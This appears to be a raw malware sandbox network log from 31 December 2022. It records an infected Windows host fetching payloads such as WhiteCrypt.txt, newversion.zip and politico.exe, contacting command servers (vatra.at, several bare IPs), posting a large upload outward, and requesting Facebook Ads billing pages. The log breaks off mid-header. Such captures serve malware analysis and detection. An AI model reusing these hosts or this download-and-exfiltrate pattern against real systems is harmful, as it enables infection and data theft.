akamai-request-bc: [a=88.221.24.111,b=431618839,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9fb17
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/xfeed.58ab99bbfec1b22f4593.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: dMyyxSMYCFUVNR5+FwFdhQ==
last-modified: Fri, 16 Dec 2022 21:57:10 GMT
etag: 0x8DADFB07B335E99
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a9d3c8be-701e-0023-27b2-13e1ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:45 GMT
akamai-request-bc: [a=88.221.24.111,b=431618909,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9fb5d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:8.8.8.8:53Requesttransfer.shIN AResponsetransfer.shIN A144.76.136.153
-
Remote address:144.76.136.153:443RequestGET /get/Sgymty/WhiteCrypt.txt HTTP/1.1
Host: transfer.sh
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:48 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2200696
Connection: keep-alive
Cache-Control: no-store
Content-Disposition: attachment; filename="WhiteCrypt.txt"
Retry-After: Sat, 31 Dec 2022 01:05:48 GMT
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1672445148
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Strict-Transport-Security: max-age=63072000
-
Remote address:216.58.208.100:80RequestGET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Cross-Origin-Opener-Policy-Report-Only: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2022-12-31-00; expires=Mon, 30-Jan-2023 00:05:51 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=AakniGPjBhBEPFYiSIuXt2pUNMDFXFFBiXXQIavQUvYO9lDfIrDpaWjy8Y0; expires=Thu, 29-Jun-2023 00:05:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=EExOuppx7An1K9KDaWxjVtqkIJ6yylp86gy6OfsYGnYaSm2EEwx2bRJSsWHSZNV8mliYu6pkJPHKTpAPrg3mXEjeiKi12fFsrerlmGqcoH09OzZkQ2FSGSU89Rh-8tQzSL8_jxnJcq7YPDrETTmKs5CXyaT7fYe-PdPrnfjORMA; expires=Sun, 02-Jul-2023 00:05:51 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Requestt.meIN AResponset.meIN A149.154.167.99
-
Remote address:149.154.167.99:443RequestGET /robloxblackl HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
Host: t.me
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12412
Connection: keep-alive
Set-Cookie: stel_ssid=18679b993f4d687c2d_10979923167627073468; expires=Sun, 01 Jan 2023 00:05:52 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
-
Remote address:116.203.164.147:80RequestGET /19 HTTP/1.1
Host: 116.203.164.147
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:116.203.164.147:80RequestGET /newversion.zip HTTP/1.1
Host: 116.203.164.147
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:53 GMT
Content-Type: application/zip
Content-Length: 1565849
Connection: keep-alive
Last-Modified: Fri, 01 Jul 2022 07:59:49 GMT
ETag: "62bea975-17e499"
Expires: Sun, 01 Jan 2023 00:05:52 GMT
Cache-Control: max-age=86400
X-Cache-Status: HIT
Accept-Ranges: bytes
-
Remote address:116.203.164.147:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----5856738145505853
Host: 116.203.164.147
Content-Length: 503252
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestnav.smartscreen.microsoft.comIN AResponsenav.smartscreen.microsoft.comIN CNAMEwd-prod-ss.trafficmanager.netwd-prod-ss.trafficmanager.netIN CNAMEwd-prod-ss-eu-west-2-fe.westeurope.cloudapp.azure.comwd-prod-ss-eu-west-2-fe.westeurope.cloudapp.azure.comIN A20.86.249.62
-
Remote address:20.86.249.62:443RequestPOST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoicU5EQW9LTlRqZ0k9Iiwia2V5IjoiZ2ZadDV6TThNL2RSa1Z0S3I2Q2dGdz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1858
Host: nav.smartscreen.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 1032
Content-Type: application/json; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,enableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,isCurfTstEnabled,isNpPIOverrideBlockEnabled,ListApiE5V2Enabled,npSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,topTrafficV2Enabled,UpdateOnMissingEtagEnabled,updateSigningCert,updateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:52 GMT
Connection: close
-
Remote address:8.8.8.8:53Requestvatra.atIN AResponsevatra.atIN A109.102.255.230vatra.atIN A190.117.75.91vatra.atIN A175.126.109.15vatra.atIN A222.236.49.124vatra.atIN A123.140.161.243vatra.atIN A186.182.55.44vatra.atIN A201.124.230.1vatra.atIN A190.140.74.43vatra.atIN A109.98.58.98vatra.atIN A151.251.24.5
-
Remote address:8.8.8.8:53Requestvatra.atIN AResponsevatra.atIN A151.251.24.5vatra.atIN A109.102.255.230vatra.atIN A190.117.75.91vatra.atIN A175.126.109.15vatra.atIN A222.236.49.124vatra.atIN A123.140.161.243vatra.atIN A186.182.55.44vatra.atIN A201.124.230.1vatra.atIN A190.140.74.43vatra.atIN A109.98.58.98
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nxavaceq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 247
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 8
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lihysn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cnajbh.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 317
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 46
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:194.135.33.239:80RequestGET /politico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.135.33.239
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:55 GMT
Content-Type: application/octet-stream
Content-Length: 7022080
Last-Modified: Sat, 31 Dec 2022 00:00:05 GMT
Connection: keep-alive
ETag: "63af7b85-6b2600"
Accept-Ranges: bytes
-
Remote address:20.86.249.62:443RequestPOST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiTU1NZVF6bXh1cnc9Iiwia2V5IjoiR2t2TVpxOXZsNkJlOS84NGR4QndsZz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1858
Host: nav.smartscreen.microsoft.com
ResponseHTTP/1.1 200 OK
Content-Length: 1032
Content-Type: application/json; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
X-SmartScreen-Flight-Vector: EnableNsHumorMatch,enableProxyLeniency,IsArsFmsIntegrationEnabled,IsCurfId0LoggingEnabled,isCurfTstEnabled,isNpPIOverrideBlockEnabled,ListApiE5V2Enabled,npSettings2004,SendGeoMapInSettingsToNewAnaheimClient,SrcEOPEnabled,topTrafficV2Enabled,UpdateOnMissingEtagEnabled,updateSigningCert,updateSigningCertForRS3RS4
Date: Sat, 31 Dec 2022 00:05:56 GMT
Connection: close
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yxcqqowkv.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 293
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jikyuthbtb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 181
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ekldnhm.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 219
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://avqqjr.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 164
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xwasrcjo.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 308
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://udsjmgkxb.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 139
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dkmthk.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 188
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://llwxw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 340
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address:109.102.255.230:80RequestPOST /tmp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tnamgv.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 197
Host: vatra.at
ResponseHTTP/1.0 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 331
Connection: close
Content-Type: text/html; charset=utf-8
-
GEThttps://ecn.dev.virtualearth.net/REST/v1/Imagery/Map/roadondemandfull/52.307,4.972/7?mapSize=268,136&shading=terrain&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=nl-nl&maxAge=86400&st=me|lv:0_vg|v:0_nh|lv:0_pp|lv:1_cp|v:0_trs|v:1;lv:0;strokeWidthScale:0.2_wt|fc:B3E5FC_cst|v:0&logo=n&da=nmsedge.exeRemote address:104.73.153.161:443RequestGET /REST/v1/Imagery/Map/roadondemandfull/52.307,4.972/7?mapSize=268,136&shading=terrain&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=nl-nl&maxAge=86400&st=me|lv:0_vg|v:0_nh|lv:0_pp|lv:1_cp|v:0_trs|v:1;lv:0;strokeWidthScale:0.2_wt|fc:B3E5FC_cst|v:0&logo=n&da=n HTTP/1.1
Host: ecn.dev.virtualearth.net
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-BM-TraceID: d5060d32e9054d92be2bf0495034e8dc
X-BM-VendorIDs: 5
X-BM-FE-Elapsed: 20
X-BM-Srv: DU0000273D
X-MS-BM-WS-INFO: 0
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: Content-Type,X-FD-Features,X-FD-FLIGHT,PreferAnonymous
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 23712
Cache-Control: public, max-age=57148
Expires: Sat, 31 Dec 2022 15:58:34 GMT
Date: Sat, 31 Dec 2022 00:06:06 GMT
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Host: 62.204.41.109
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:06:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:8.8.8.8:53Requestclients2.google.comIN AResponseclients2.google.comIN CNAMEclients.l.google.comclients.l.google.comIN A142.250.179.174
-
Remote address:8.8.8.8:53Requestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
GEThttps://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=89.0.4389.114&lang=en-US&acceptformat=crx3&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D49%2526e%253D1chrome.exeRemote address:142.250.179.174:443RequestGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=89.0.4389.114&lang=en-US&acceptformat=crx3&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D49%2526e%253D1 HTTP/2.0
host: clients2.google.com
x-goog-update-interactivity: fg
x-goog-update-appid: pkedcjkdefgpdelpbcmbmeomcjbeemfm
x-goog-update-updater: chromecrx-89.0.4389.114
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
POSThttps://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardchrome.exeRemote address:172.217.168.237:443RequestPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/2.0
host: accounts.google.com
content-length: 1
origin: https://www.google.com
content-type: application/x-www-form-urlencoded
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestwww.facebook.comIN AResponsewww.facebook.comIN CNAMEstar-mini.c10r.facebook.comstar-mini.c10r.facebook.comIN A157.240.247.35
-
Remote address:8.8.8.8:53Requestwww.facebook.comIN AResponsewww.facebook.comIN CNAMEstar-mini.c10r.facebook.comstar-mini.c10r.facebook.comIN A157.240.247.35
-
Remote address:157.240.247.35:443RequestGET /ads/manager/account_settings/account_billing HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
Host: www.facebook.com
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-prefers-color-scheme: light
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
ResponseHTTP/1.1 302 Found
x-fb-rlafr: 0
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: same-origin-allow-popups
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: qMy0cTb3lTjt5W2YnbNRTxF1KDm7gkwj/1/Mh2oy/qsB+ZrGxqKiWQuIj+Lbwd1EidB1ZSvQdhGKNkw9ldU1sg==
Date: Sat, 31 Dec 2022 00:06:31 GMT
Priority: u=3,i
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 0
-
GEThttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingD5F9.exeRemote address:157.240.247.35:443RequestGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
Host: www.facebook.com
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-prefers-color-scheme: light
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
ResponseHTTP/1.1 200 OK
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
x-fb-rlafr: 0
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri 